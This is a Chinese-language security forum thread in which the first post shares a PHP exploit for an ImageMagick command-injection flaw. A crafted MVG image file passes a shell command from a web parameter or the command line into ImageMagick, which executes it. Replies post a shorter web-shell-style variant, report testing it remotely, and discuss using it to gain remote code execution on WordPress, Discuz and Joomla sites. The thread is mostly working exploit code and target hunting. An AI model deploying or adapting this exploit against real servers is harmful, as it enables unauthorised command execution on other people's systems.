先贴链接:http://pastebin.com/aE4sKnCg
ImageMagick 的新洞,可以影响司机驾驶。
exp 代码: echo "Disable Functions: " . ini_get('disable_functions') . "\n";
$command = PHP_SAPI == 'cli' ? $argv[1] : $_GET['cmd'];
if ($command == '') {
$command = 'id';
}
$exploit = <<
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg"|$command")'
pop graphic-context
EOF;
file_put_contents("KKKK.mvg", $exploit);
$thumb = new Imagick();
$thumb->readImage('KKKK.mvg');
$thumb->writeImage('KKKK.png');
$thumb->clear();
$thumb->destroy();
unlink("KKKK.mvg");
unlink("KKKK.png");
?>
远程打了一下..
感觉还是file_put_contents在/tmp里比较好(
各种去找老司机了
凶!!!
还在和老司机学序列化,这个就来了。。。
66666
听说有人要用这个 去挖wp的rce
感谢分享非常棒
@todaro 卧槽,我去挖挖看..
赞!
@Ricter @todaro 整了一下午,discuz失败wp成功,主站发了一个
@phith0n 我也找到了wp的rce..可怕
@phith0n 不过需要权限,哭瞎= =
@Ricter discuz那个给我气死了,弄了好久结果也没弄出来
@phith0n discuz那个好像直接调用 imagick 的命令行,我就没再细看了。
简化一下楼主的代码如下: $c=$_REQUEST['c'];
$e = <<
viewbox 0 0 640 480
fill 'url(https://"|$c")'
pop graphic-context
EOF;
$i = new Imagick();
$i->readImageBlob($e);
@CplusHua
啊原来 readImageBlob 就可以(
@CplusHua $thumb = new Imagick($imagick_file); 这样就能直接命令执行了...都不用调用啥
@YiYang 这个版本我记得要5.4以上吧。。。你那个是5.2,估计不行。。。。
@phith0n joomla、水滴之类的,都有机会的吧
@phith0n 包括这个,https://www.npmjs.com/search?q=imagemagick
@7路公交老司机 是的,老版本没这个扩展。。。
前提需要安装imagick模块,
@Ricter 对啊,如果一些网站对图片进行二次渲染,会不会只要上传图片就能执行了.
ding
6666666666666坐等老司机挖洞利用姿势